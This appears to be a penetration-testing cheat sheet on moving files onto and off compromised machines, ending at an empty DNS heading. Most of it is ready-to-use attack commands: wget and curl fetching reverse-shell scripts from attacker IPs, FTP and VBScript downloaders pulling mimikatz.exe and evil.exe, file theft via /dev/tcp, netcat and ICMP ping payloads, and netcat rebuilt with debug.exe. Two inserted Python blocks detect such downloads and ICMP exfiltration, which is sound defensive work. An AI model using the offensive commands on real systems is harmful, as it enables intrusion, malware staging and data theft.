Exfiltration

Copy&Paste Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
#certutil -encode wraps the output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines; strip them before decoding the file with base64 -d on Linux

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
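Defender-side view of the Windows download primitives listed above (certutil -urlcache/-decode, bitsadmin /transfer, Net.WebClient, Invoke-WebRequest -OutFile, Start-BitsTransfer). This is an added example, not HackTricks' code: it runs simple command-line rules over process-creation records and pulls out the URL each one fetched. The record format (`<timestamp> <image> | <command line>`), the rule names and the sample log lines are constructed assumptions; the 192.0.2.10 address is a documentation range, not a real host.

```python
import re
from dataclasses import dataclass

# Command-line rules for the download primitives listed above. Constructed here (assumption:
# command lines are logged verbatim, as Sysmon event 1 or 4688 with command-line auditing do).
DOWNLOAD_RULES = [
    ("certutil-urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("certutil-decode", re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I)),
    ("bitsadmin-transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I)),
    ("ps-webclient", re.compile(r"Net\.WebClient\b.*\.Download(?:File|String)\(", re.I)),
    ("ps-outfile", re.compile(r"\b(?:Invoke-WebRequest|iwr|wget|curl)\b.*-OutFile\b", re.I)),
    ("ps-bits", re.compile(r"\bStart-BitsTransfer\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


@dataclass
class Hit:
    timestamp: str
    image: str
    technique: str
    url: str


def parse_record(line: str):
    """Split a constructed '<timestamp> <image> | <command line>' record; None if malformed."""
    try:
        head, cmdline = line.split(" | ", 1)
        timestamp, image = head.split(" ", 1)
    except ValueError:
        return None
    return timestamp, image, cmdline


def scan(lines):
    """Return one Hit per record that matches a download rule (first matching rule wins)."""
    hits = []
    for line in lines:
        parsed = parse_record(line)
        if parsed is None:
            continue  # malformed record, skip rather than crash the whole scan
        timestamp, image, cmdline = parsed
        for technique, rule in DOWNLOAD_RULES:
            if rule.search(cmdline):
                url = URL_RE.search(cmdline)
                hits.append(Hit(timestamp, image, technique, url.group(0) if url else ""))
                break
    return hits


# Constructed process-creation records mirroring the commands listed above; the last two
# are benign noise that must not fire.
SAMPLE_LOG = [
    r"2024-05-01T10:00:01Z C:\Windows\System32\certutil.exe | certutil -urlcache -split -f http://192.0.2.10/payload.b64 payload.b64",
    r"2024-05-01T10:00:02Z C:\Windows\System32\certutil.exe | certutil -decode payload.b64 payload.dll",
    r"2024-05-01T10:00:05Z C:\Windows\System32\bitsadmin.exe | bitsadmin /transfer job1 /priority high http://192.0.2.10/f.pdf C:\Users\Public\f.pdf",
    r"2024-05-01T10:01:00Z C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.10/t.exe','C:\Windows\Temp\t.exe')",
    r'2024-05-01T10:01:30Z C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Invoke-WebRequest "http://192.0.2.10/t.exe" -OutFile "t.exe"',
    r"2024-05-01T10:02:00Z C:\Windows\System32\certutil.exe | certutil -verify cert.cer",
    r"2024-05-01T10:02:10Z C:\Windows\System32\notepad.exe | notepad.exe readme.txt",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.technique:20} {hit.image} {hit.url}")
```

The rules key on the argument that does the download (`-urlcache ... -f`, `/transfer`, `-OutFile`) rather than on the binary name alone, so a legitimate `certutil -verify` does not fire; the extracted URL is what you would pivot on in proxy or DNS logs.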

Upload files

HTTPS Server

# from https://gist.github.com/dergachev/7028596 (ported here from Python 2 to Python 3)
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python3 simple-https-server.py
# then in your browser, visit:
# https://localhost:443

import http.server
import ssl

# serve the current directory over TLS on all interfaces (binding port 443 needs root)
httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
# server.pem holds both the self-signed certificate and its private key
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

FTP

FTP server (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP server (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP server (pure-ftpd)

apt-get update && apt-get install pure-ftpd

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows client

#Works well with the python server. With pure-ftpd use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali as server

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create an SMB share using samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

The attacker has to have SSHd running.

scp <username>@<Attacker_IP>:<directory>/<filename> . #scp needs a destination, here the current directory

NC

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Download file from victim

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

Upload file to victim

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim (same port the attacker is listening on)
exec 6< /dev/tcp/10.10.10.10/80
cat <&6 > file.txt

thanks to @BinaryShadow_

ICMP

#In order to exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This sends 4 bytes per ping packet (you could probably increase this up to 16)
from scapy.all import *
#This is ippsec's receiver, created for the HTB machine Mischief
def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:] #Read the 4 interesting bytes
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
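The defender's counterpart to the xxd/ping loop and the scapy receiver above, as an added example that is not HackTricks' or ippsec's code: it parses raw IPv4/ICMP echo packets with the standard library only, flags any echo whose payload is not what a stock ping binary sends, and recovers the repeated `-p` pattern so an analyst can see what left the host. Assumptions: hosts use the stock iputils (timestamp plus 0x10, 0x11, ...) or Windows (fixed 32-byte alphabet) ping payloads, packets arrive without a link-layer header, and all sample traffic is constructed inline.

```python
import struct
from dataclasses import dataclass

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8

# Benign baselines (assumption: hosts run stock ping binaries).
# Windows ping sends a fixed 32-byte alphabet payload.
WINDOWS_PADDING = b"abcdefghijklmnopqrstuvwabcdefghi"


def iputils_padding(data_len: int) -> bytes:
    """Default iputils ping payload: 8-byte timestamp, then 0x10, 0x11, ... (56 bytes by default)."""
    return bytes(8) + bytes((0x10 + i) & 0xFF for i in range(data_len - 8))


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_frame(src: str, dst: str, icmp_type: int, seq: int, payload: bytes) -> bytes:
    """Constructed IPv4 + ICMP echo packet (no link layer); only used to build sample input."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, 0x4242, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", internet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0x4000, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return ip[:10] + struct.pack("!H", internet_checksum(ip)) + ip[12:] + icmp


def parse_frame(frame: bytes):
    """Return (src, dst, icmp_type, seq, payload) for an IPv4 ICMP echo packet, else None."""
    if len(frame) < 20 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None
    ihl = (frame[0] & 0x0F) * 4
    if len(frame) < ihl + 8:
        return None
    icmp_type, _code, _csum, _ident, seq = struct.unpack("!BBHHH", frame[ihl:ihl + 8])
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return None
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    return src, dst, icmp_type, seq, frame[ihl + 8:]


def is_baseline_payload(payload: bytes) -> bool:
    """True when the payload is what an unmodified ping would send."""
    if payload == WINDOWS_PADDING:
        return True
    # skip the timestamp in the first 8 bytes and compare the rest with the iputils pattern
    return len(payload) >= 16 and payload[8:] == iputils_padding(len(payload))[8:]


def smallest_period(data: bytes) -> bytes:
    """ping -p repeats a pattern of at most 16 bytes over the data field; recover the pattern."""
    for n in range(1, 17):
        if len(data) % n == 0 and data[:n] * (len(data) // n) == data:
            return data[:n]
    return data


@dataclass
class Finding:
    src: str
    dst: str
    seq: int
    chunk: bytes


def inspect(frames):
    """Flag echo packets whose payload matches no ping baseline and extract the carried chunk."""
    findings = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, _icmp_type, seq, payload = parsed
        if is_baseline_payload(payload):
            continue
        # ping overwrites the first 8 bytes with its timestamp, so the pattern survives in the tail
        findings.append(Finding(src, dst, seq, smallest_period(payload[8:])))
    return findings


def reassemble(findings, src: str) -> bytes:
    """Join the chunks seen from one host in sequence order, as an analyst would when triaging."""
    return b"".join(f.chunk for f in sorted(findings, key=lambda f: f.seq) if f.src == src)


# Constructed sample traffic: one Linux ping, one Windows ping, then three "ping -p" style
# packets from 10.0.0.5 carrying the kind of 4-byte chunks the xxd/ping loop above produces.
SAMPLE_FRAMES = [
    build_frame("10.0.0.7", "10.0.0.1", ICMP_ECHO_REQUEST, 1, iputils_padding(56)),
    build_frame("10.0.0.9", "10.0.0.1", ICMP_ECHO_REQUEST, 1, WINDOWS_PADDING),
] + [
    build_frame("10.0.0.5", "203.0.113.10", ICMP_ECHO_REQUEST, seq, bytes(8) + chunk * 12)
    for seq, chunk in enumerate([b"secr", b"et-d", b"ata!"], start=1)
]

if __name__ == "__main__":
    found = inspect(SAMPLE_FRAMES)
    for f in found:
        print(f"{f.src} -> {f.dst} seq={f.seq} chunk={f.chunk!r}")
    print("recovered:", reassemble(found, "10.0.0.5"))
```

The baseline comparison is the detection; a chunk whose bytes are all identical collapses to a shorter period, so treat the recovered bytes as a lead rather than an exact copy. In production the same check belongs in an IDS rule on echo payload content, paired with rate and volume thresholds per source.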

SMTP

If you can send data to an SMTP server, you can create an SMTP server to receive the data with python (the smtpd module was removed in Python 3.12, so this needs an older interpreter):

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

By default in XP and 2003 (in others it needs to be explicitly added during installation)
In Kali, start TFTP server:

#I didn't get these options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/to/nc.exe /tftp

TFTP server in python:

pip install ptftpd
ptftpd -p 69 tap0 . # ptftpd -p <PORT> <IFACE> <FOLDER>

In victim, connect to the Kali server:

tftp -i <KALI-IP> get nc.exe

PHP

Download a file with a PHP oneliner:

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

Attacker> python -m SimpleHTTPServer 80

Victim

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

This is a crazy technique that works on 32-bit Windows machines. The idea is to use the debug.exe program, which is used to inspect binaries like a debugger but can also rebuild them from hex. So we take a binary, like netcat, dump it into hex, paste that into a file on the compromised machine, and then assemble it with debug.exe.
Debug.exe can only assemble 64 kb, so we need to use files smaller than that. We can use upx to compress the binary even further:

upx -9 nc.exe

Now it only weighs 29 kb. Perfect. Now let's dump it into hex:

wine exe2bat.exe nc.exe nc.txt

Now we just copy-paste the text into our Windows shell, and it will automatically create a file called nc.exe.

DNS
